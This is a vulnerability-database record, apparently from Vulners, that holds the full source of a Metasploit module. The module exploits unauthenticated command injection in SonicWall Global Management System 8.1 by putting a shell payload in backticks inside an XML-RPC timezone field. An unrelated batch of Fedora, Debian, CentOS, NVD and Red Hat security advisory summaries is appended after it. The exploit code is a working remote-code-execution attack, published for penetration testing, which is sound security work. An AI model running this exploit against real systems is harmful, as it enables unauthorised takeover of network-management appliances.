{"id": "MSF:EXPLOIT/UNIX/SONICWALL/SONICWALL_XMLRPC_RCE", "type": "metasploit", "bulletinFamily": "exploit", "title": "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE", "description": "This module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 (Build 8110.1197) and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire network security environment.' These vulnerable versions (8.1 Build 8110.1197 and below) do not prevent unauthenticated, external entities from making XML-RPC requests to port 21009 of the virtual app. After the XML-RPC call is made, a shell script is called like so: 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://www.digitaldefense.com/digital-defense/vrt-discoveries/", "https://slides.com/kernelsmith/bsidesaustin2018/#/"], "cvelist": [], "lastseen": "2020-10-14T21:02:34", "viewCount": 71, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2020-10-14T21:02:34", "rev": 2}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0603", "RHSA-2021:0558", "RHSA-2021:0557", "RHSA-2021:0548", "RHSA-2021:0600", "RHSA-2021:0436", "RHSA-2021:0568", "RHSA-2021:0549", "RHSA-2021:0599", "RHSA-2021:0551"]}, {"type": "fedora", "idList": ["FEDORA:D876630B21C8", "FEDORA:1DBB230B131F", "FEDORA:4E16930B130B", "FEDORA:F300430AD103", "FEDORA:3BF713093F7B", "FEDORA:28A5130A3C09"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-9058"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2561-1:72FAB"]}], "modified": "2020-10-14T21:02:34", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"SonicWall Global Management System XMLRPC set_time_zone Unauth RCE\",\n 'Description' => %q{\n This module exploits a vulnerability in SonicWall Global\n Management System Virtual Appliance versions 8.1 (Build 8110.1197)\n and below. This virtual appliance can be downloaded from\n http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a\n holistic way to manage your entire network security environment.'\n\n These vulnerable versions (8.1 Build 8110.1197 and below) do not\n prevent unauthenticated, external entities from making XML-RPC\n requests to port 21009 of the virtual app. After the XML-RPC call\n is made, a shell script is called like so:\n 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Michael Flanders', #MSF Module\n 'kernelsmith' #Advisor\n ],\n 'References' => [\n ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],\n ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']\n ],\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [\n [ 'SonicWall Global Management System Virtual Appliance', {} ],\n ],\n 'Payload' => {\n # Can't use ampersand, Java's XML-RPC parser will complain and return an error\n 'BadChars' => \"\\x26\",\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic bash telnet'\n }\n },\n 'DisclosureDate' => '2016-07-22',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.\n Defaults to 80/443 depending on SSL.'])\n ])\n end\n\n def check\n if datastore['WEB_SERVER_PORT']\n port_number = datastore['WEB_SERVER_PORT']\n else\n port_number = datastore['SSL'] ? '443' : '80'\n end\n\n handler = datastore['SSL'] ? 'https' : 'http'\n\n res = request_url(\"#{handler}://#{rhost}:#{port_number}\")\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Unknown\n end\n\n unless res.code == 200 && res.body =~ /<TITLE>.+v(\\d\\.\\d)/\n return CheckCode::Safe\n end\n\n version = Gem::Version.new $1.to_s\n\n unless version <= Gem::Version.new('8.1')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n fail_with Failure::NotVulnerable, \"The target is not vulnerable.\"\n end\n\n print_status \"The target appears to be vulnerable, continuing exploit...\"\n send_xml\n end\n\n def send_xml\n xml_body = <<~HERESTRING\n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <methodCall>\n <methodName>set_time_config</methodName>\n <params>\n <param>\n <value>\n <struct>\n <member>\n <name>timezone</name>\n <value>\n <string>\"`#{payload.encoded}`\"</string>\n </value>\n </member>\n </struct>\n </value>\n </param>\n </params>\n </methodCall>\n HERESTRING\n\n res = send_request_raw({\n 'method' => 'POST',\n 'uri' => '/',\n 'data' => xml_body,\n 'ctype' => 'text/xml; charset=UTF-8'\n })\n\n unless res && res.body.include?(\"success\")\n print_error(\"Error sending XML to #{rhost}:#{rport}\")\n end\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": []}

{"fedora": [{"lastseen": "2021-04-11T00:28:47", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3426"], "description": "Python 3.9 package for developers. This package exists to allow developers to test their code against a newer version of Python. This is not a full Python stack and if you wish to run your applications with Python 3.9, update your Fedora to a newer version once Python 3.9 is stable. ", "modified": "2021-04-10T23:19:28", "published": "2021-04-10T23:19:28", "id": "FEDORA:79CAE30A5759", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: python39-3.9.4-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-11T00:28:47", "bulletinFamily": "unix", "cvelist": [], "description": "libopenmpt is a cross-platform C++ and C library to decode tracked music files (modules) into a raw PCM audio stream. libopenmpt is based on the player code of the OpenMPT project (Open ModPlug Tracker). In order to avoid code base fragmentation, libopenmpt is developed in the same source code repository as OpenMPT. ", "modified": "2021-04-10T23:19:27", "published": "2021-04-10T23:19:27", "id": "FEDORA:D5FC8304C692", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: libopenmpt-0.4.19-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-11T00:28:47", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14372", "CVE-2020-25632", "CVE-2020-25647", "CVE-2020-27749", "CVE-2020-27779", "CVE-2021-20225", "CVE-2021-20233"], "description": " The GRand Unified Bootloader (GRUB) is a highly configurable and customizable bootloader with modular architecture. It supports a rich variety of kernel formats, file systems, computer architectures and hardware devices. ", "modified": "2021-04-10T23:06:25", "published": "2021-04-10T23:06:25", "id": "FEDORA:5DC52306C90A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: grub2-2.06~rc1-1.fc33", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-11T00:28:47", "bulletinFamily": "unix", "cvelist": [], "description": "libopenmpt is a cross-platform C++ and C library to decode tracked music files (modules) into a raw PCM audio stream. libopenmpt is based on the player code of the OpenMPT project (Open ModPlug Tracker). In order to avoid code base fragmentation, libopenmpt is developed in the same source code repository as OpenMPT. ", "modified": "2021-04-10T23:06:24", "published": "2021-04-10T23:06:24", "id": "FEDORA:CE7C93046B3F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: libopenmpt-0.4.19-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": ["CVE-2021-29421"], "description": "pikepdf is a Python library for reading and writing PDF files. pikepdf is based on QPDF, a powerful PDF manipulation and repair library. ", "modified": "2021-04-09T15:41:16", "published": "2021-04-09T15:41:16", "id": "FEDORA:DFC7630CE319", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: python-pikepdf-1.19.4-2.fc32", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27840", "CVE-2021-20277"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2021-04-09T15:41:07", "published": "2021-04-09T15:41:07", "id": "FEDORA:0DD873072EBE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: samba-4.12.14-0.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": ["CVE-2020-25097"], "description": "Squid is a high-performance proxy caching server for Web clients, supporting FTP, gopher, and HTTP data objects. Unlike traditional caching software, Squid handles all requests in a single, non-blocking, I/O-driven process. Squid keeps meta data and especially hot objects cached in RAM, caches DNS lookups, supports non-blocking DNS lookups, and implements negative caching of failed requests. Squid consists of a main server program squid, a Domain Name System lookup program (dnsserver), a program for retrieving FTP data (ftpget), and some management and client tools. ", "modified": "2021-04-09T15:41:07", "published": "2021-04-09T15:41:07", "id": "FEDORA:E851B30CD31F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: squid-4.14-1.fc32", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27840", "CVE-2021-20277"], "description": "An extensible library that implements an LDAP like API to access remote LDAP servers, or use local tdb databases. ", "modified": "2021-04-09T15:41:06", "published": "2021-04-09T15:41:06", "id": "FEDORA:BAC3130A4CEB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: libldb-2.1.5-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": [], "description": "Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use with your own software. The virus database is based on the virus database from OpenAntiVirus, but contains additional signatures (including signatures for popular polymorphic viruses, too) and is KEPT UP TO DATE. ", "modified": "2021-04-09T15:17:22", "published": "2021-04-09T15:17:22", "id": "FEDORA:C624430AF05F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: clamav-0.103.2-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-09T22:40:46", "bulletinFamily": "unix", "cvelist": ["CVE-2021-29421"], "description": "pikepdf is a Python library for reading and writing PDF files. pikepdf is based on QPDF, a powerful PDF manipulation and repair library. ", "modified": "2021-04-09T15:17:19", "published": "2021-04-09T15:17:19", "id": "FEDORA:A5D4030A6063", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: python-pikepdf-1.19.4-2.fc33", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2021-04-10T22:30:40", "bulletinFamily": "unix", "cvelist": ["CVE-2020-25085", "CVE-2021-3416", "CVE-2021-3392", "CVE-2021-3409", "CVE-2020-17380", "CVE-2021-20257", "CVE-2021-20255", "CVE-2021-20203"], "description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-2623-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Markus Koschany\nApril 10, 2021 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : qemu\nVersion : 1:2.8+dfsg-6+deb9u14\nCVE ID : CVE-2020-17380 CVE-2021-3392 CVE-2021-3409 CVE-2021-3416 \n CVE-2021-20203 CVE-2021-20255 CVE-2021-20257\nDebian Bug : 984450 984451 984452 984448 984449 970937\n\nSeveral security vulnerabilities have been discovered in QEMU, a fast processor\nemulator.\n\nCVE-2021-20257\n\n net: e1000: infinite loop while processing transmit descriptors\n\n\nCVE-2021-20255\n\n A stack overflow via an infinite recursion vulnerability was found in the\n eepro100 i8255x device emulator of QEMU. This issue occurs while processing\n controller commands due to a DMA reentry issue. This flaw allows a guest\n user or process to consume CPU cycles or crash the QEMU process on the\n host, resulting in a denial of service.\n\nCVE-2021-20203\n\n An integer overflow issue was found in the vmxnet3 NIC emulator of the\n QEMU. It may occur if a guest was to supply invalid values for rx/tx queue\n size or other NIC parameters. A privileged guest user may use this flaw to\n crash the QEMU process on the host resulting in DoS scenario.\n\nCVE-2021-3416\n\n A potential stack overflow via infinite loop issue was found in various NIC\n emulators of QEMU in versions up to and including 5.2.0. The issue occurs\n in loopback mode of a NIC wherein reentrant DMA checks get bypassed. A\n guest user/process may use this flaw to consume CPU cycles or crash the\n QEMU process on the host resulting in DoS scenario.\n\n\nCVE-2021-3416\n\n The patch for CVE-2020-17380/CVE-2020-25085 was found to be ineffective,\n thus making QEMU vulnerable to the out-of-bounds read/write access issues\n previously found in the SDHCI controller emulation code. This flaw allows a\n malicious privileged guest to crash the QEMU process on the host, resulting\n in a denial of service or potential code execution.\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:2.8+dfsg-6+deb9u14.\n\nWe recommend that you upgrade your qemu packages.\n\nFor the detailed security status of qemu please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/qemu\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-04-10T21:21:20", "published": "2021-04-10T21:21:20", "id": "DEBIAN:DLA-2623-1:40F55", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202104/msg00009.html", "title": "[SECURITY] [DLA 2623-1] qemu security update", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-10T22:24:34", "bulletinFamily": "unix", "cvelist": ["CVE-2021-30157", "CVE-2021-30154", "CVE-2021-20270", "CVE-2021-27291", "CVE-2021-30155", "CVE-2021-30152", "CVE-2021-30158", "CVE-2021-30159"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4889-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nApril 10, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki\nCVE ID : CVE-2021-20270 CVE-2021-27291 CVE-2021-30152 CVE-2021-30159\n CVE-2021-30154 CVE-2021-30155 CVE-2021-30157 CVE-2021-30158 \n\nMultiple security issues were found in MediaWiki, a website engine for\ncollaborative work, which could result in incomplete page/blocking\nprotection, denial of service or cross-site scripting.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 1:1.31.14-1~deb10u1.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFor the detailed security status of mediawiki please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/mediawiki\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-04-10T15:47:12", "published": "2021-04-10T15:47:12", "id": "DEBIAN:DSA-4889-1:BE561", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00070.html", "title": "[SECURITY] [DSA 4889-1] mediawiki security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-04-10T22:22:01", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27379", "CVE-2021-26933"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4888-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nApril 10, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xen\nCVE ID : CVE-2021-26933 CVE-2021-27379\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor,\nwhich could result in denial of service, privilege escalation or memory\ndisclosure.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.11.4+99-g8bce4698f6-1.\n\nWe recommend that you upgrade your xen packages.\n\nFor the detailed security status of xen please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/xen\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-04-10T15:38:52", "published": "2021-04-10T15:38:52", "id": "DEBIAN:DSA-4888-1:6EB73", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00069.html", "title": "[SECURITY] [DSA 4888-1] xen security update", "type": "debian", "cvss": {"score": 5.9, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-04-09T22:15:01", "bulletinFamily": "unix", "cvelist": ["CVE-2021-28658"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2622-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Chris Lamb\nApril 09, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : python-django\nVersion : 1:1.10.7-2+deb9u12\nCVE ID : CVE-2021-28658\nDebian Bug : #986447\n\nIt was discovered that there was a potential directory traversal\nissue in Django, a Python-based web development framework.\n\nThe vulnerability could have been exploited by maliciously crafted\nfilenames. However, the upload handlers built into Django itself\nwere not affected.\n\nFor Debian 9 &quot;Stretch&quot;, this problem has been fixed in version\n1:1.10.7-2+deb9u12.\n\nWe recommend that you upgrade your python-django packages.\n\nFor the detailed security status of python-django please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/python-django\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-04-09T11:48:27", "published": "2021-04-09T11:48:27", "id": "DEBIAN:DLA-2622-1:ECA08", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202104/msg00008.html", "title": "[SECURITY] [DLA 2622-1] python-django security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}], "centos": [{"lastseen": "2021-04-10T22:38:01", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20277"], "description": "**CentOS Errata and Security Advisory** CESA-2021:1072\n\n\nThe libldb packages provide an extensible library that implements an LDAP-like API to access remote LDAP servers, or use local TDB databases.\n\nSecurity Fix(es):\n\n* samba: Out of bounds read in AD DC LDAP server (CVE-2021-20277)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2021-April/048299.html\n\n**Affected packages:**\nldb-tools\nlibldb\nlibldb-devel\npyldb\npyldb-devel\n\n**Upstream details at:**\n", "edition": 1, "modified": "2021-04-10T17:14:31", "published": "2021-04-10T17:14:31", "id": "CESA-2021:1072", "href": "http://lists.centos.org/pipermail/centos-announce/2021-April/048299.html", "title": "ldb, libldb, pyldb security update", "type": "centos", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-10T23:43:32", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27365", "CVE-2021-27364", "CVE-2021-27363"], "description": "**CentOS Errata and Security Advisory** CESA-2021:1071\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: out-of-bounds read in libiscsi module (CVE-2021-27364)\n\n* kernel: heap buffer overflow in the iSCSI subsystem (CVE-2021-27365)\n\n* kernel: iscsi: unrestricted access to sessions and handles (CVE-2021-27363)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Customer testing eMMC sees and intermittent boot problem on 7.8+, was not seen on 7.3 (BZ#1918916)\n\n* tcm loopback driver causes double-start of scsi command when work is delayed (BZ#1925652)\n\n* [Azure][RHEL-7]Mellanox Patches To Prevent Kernel Hang In MLX4 (BZ#1925691)\n\n* A patch from upstream c365c292d059 causes us to end up leaving rt_nr_boosted in an inconsistent state, which causes a hard lockup. (BZ#1928082)\n\n* [RHEL7.9.z] Add fix to update snd_wl1 in bulk receiver fast path (BZ#1929804)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2021-April/048298.html\n\n**Affected packages:**\nbpftool\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\n", "edition": 1, "modified": "2021-04-10T17:09:38", "published": "2021-04-10T17:09:38", "id": "CESA-2021:1071", "href": "http://lists.centos.org/pipermail/centos-announce/2021-April/048298.html", "title": "bpftool, kernel, perf, python security update", "type": "centos", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-04-10T19:36:27", "description": "A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.", "edition": 1, "cvss3": {}, "published": "2021-04-09T18:15:00", "title": "CVE-2021-20021", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-20021"], "modified": "2021-04-09T18:54:00", "cpe": [], "id": "CVE-2021-20021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20021", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-04-10T19:36:27", "description": "SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to upload an arbitrary file to the remote host.", "edition": 1, "cvss3": {}, "published": "2021-04-09T18:15:00", "title": "CVE-2021-20022", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-20022"], "modified": "2021-04-09T18:54:00", "cpe": [], "id": "CVE-2021-20022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20022", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "redhat": [{"lastseen": "2021-04-10T20:28:18", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20305"], "description": "Nettle is a cryptographic library that is designed to fit easily in almost any context: In crypto toolkits for object-oriented languages, such as C++, Python, or Pike, in applications like LSH or GNUPG, or even in kernel space.\n\nSecurity Fix(es):\n\n* nettle: Out of bounds memory access in signature verification (CVE-2021-20305)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-04-09T01:11:54", "published": "2021-04-09T00:53:25", "id": "RHSA-2021:1145", "href": "https://access.redhat.com/errata/RHSA-2021:1145", "type": "redhat", "title": "(RHSA-2021:1145) Important: nettle security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}